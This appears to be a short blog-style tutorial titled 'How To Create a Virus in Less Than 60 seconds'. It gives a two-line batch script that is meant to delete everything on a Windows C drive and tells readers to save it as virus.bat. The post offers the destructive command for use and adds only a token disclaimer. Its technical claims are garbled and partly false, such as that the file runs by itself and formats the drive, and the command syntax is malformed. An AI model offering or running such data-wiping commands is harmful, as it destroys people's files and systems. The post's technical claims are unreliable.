How To Create a Virus in Less Than 60 seconds?
Today we are here with the method to How To Create a Virus in Less Than 60 seconds. Today every second person is using computer and almost everyone of them knows about virus. Virus is a malicious program that enters into computer without your permission and can affect your data and operating system working. Well viruses are of different types as there are trojan horse and many more. But did you think about creating a virus. Yes you can do it just within 60 seconds. And it is possible with a very simple and easy method that i have discussed in this post, so just read out the below to proceed.
Many of you will think the method will be of great coding, but there is nothing like that , you just have to write 5-6 words to create a very harmful virus that can even format the computer drive completely. The trick is based on notepad and some words of batch program that will run automatically when it opens in a computer system and will format the selected drive and may corrupt the operating system of that computer. Just follow up the below steps for creating a virus within a minute.
First of all in your windows OS open the notepad.
Now copy and paste the below code in your notepad screen.
@Echo off
Del C:\ *.* |y
Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
Now running this virus file will delete the C drive completely and the operating system of the respective computer will get corrupted.
This method is only for knowledge purpose. Don’t try this in your computer as it will completely format your C drive.

   I'll not be responsible for any harm by this trick. do this as your on risk.

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